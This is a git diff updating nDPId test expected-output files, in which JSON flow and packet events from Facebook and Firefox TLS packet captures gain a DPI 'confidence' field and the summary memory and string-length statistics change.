 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
-00885{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}}
-01330{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
+00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}}
+01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
-00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","total-events-serialized":17}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -23,10 +23,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4609090 bytes
-~~ total memory freed........: 4609090 bytes
-~~ total allocations/frees...: 99637/99637
+~~ total memory allocated....: 4693715 bytes
+~~ total memory freed........: 4693715 bytes
+~~ total allocations/frees...: 101227/101227
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 1335 chars
-~~ json string avg len.......: 818 chars
+~~ json string max len.......: 1361 chars
+~~ json string avg len.......: 831 chars
diff --git a/test/results/firefox.pcap.out b/test/results/firefox.pcap.out
index 152c10893..229a735f9 100644
--- a/test/results/firefox.pcap.out
+++ b/test/results/firefox.pcap.out
@@ -3,20 +3,20 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"}
-00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"}
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"}
